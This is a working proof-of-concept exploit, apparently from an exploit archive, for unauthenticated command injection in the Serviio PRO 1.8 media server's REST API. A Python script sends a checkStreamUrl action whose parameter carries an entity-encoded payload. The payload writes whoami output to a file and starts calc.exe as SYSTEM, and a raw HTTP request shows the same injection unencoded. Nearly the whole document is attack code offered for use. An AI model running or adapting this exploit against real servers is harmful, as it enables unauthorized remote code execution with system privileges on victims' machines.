Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution

                                                # The PoC will create a file testingus3.txt in 'C:\Program Files\Serviio\bin' with whoami
# output in it and start a calc.exe child process as nt authority\system.
#

from urllib2 import Request, urlopen
import sys

if (len(sys.argv) <= 1):
        print '[*] Usage: serviio_rce.py <ip address>'
        exit(0)

host = sys.argv[1]

values = """
<action>
    <name>checkStreamUrl</name>
    <parameter>VIDEO</parameter>
    <parameter>1.2.3.4&#x27;&#x5c;&#x22;&#x60;&#x26;&#x77;&#x68;&#x6f;&#x61;&#x6d;&#x69;&#x20;&#x3e;&#x74;&#x65;&#x73;&#x74;&#x69;&#x6e;&#x67;&#x75;&#x73;&#x33;&#x2e;&#x74;&#x78;&#x74;&#x26;&#x26;&#x63;&#x61;&#x6c;&#x63;&#x26;&#x60;&#x27;</parameter>
</action>"""

headers = {
  'Content-Type': 'application/xml',
  'Accept': 'application/xml'
}
request = Request('http://'+host+':23423/rest/action', data=values, headers=headers)

response_body = urlopen(request).read()
print response_body


'''
Raw request:

POST /rest/action HTTP/1.1
Host: 10.211.55.3:23423
Content-Length: 93
Accept: application/json, text/plain, */*
Origin: http://10.211.55.3:23423
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: http://10.211.55.3:23423/console/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
DNT: 1
Connection: close

{"name":"checkStreamUrl","parameter":["VIDEO","1.2.3.4'\"`&whoami >testingus3.txt&&calc&`'"]}

'''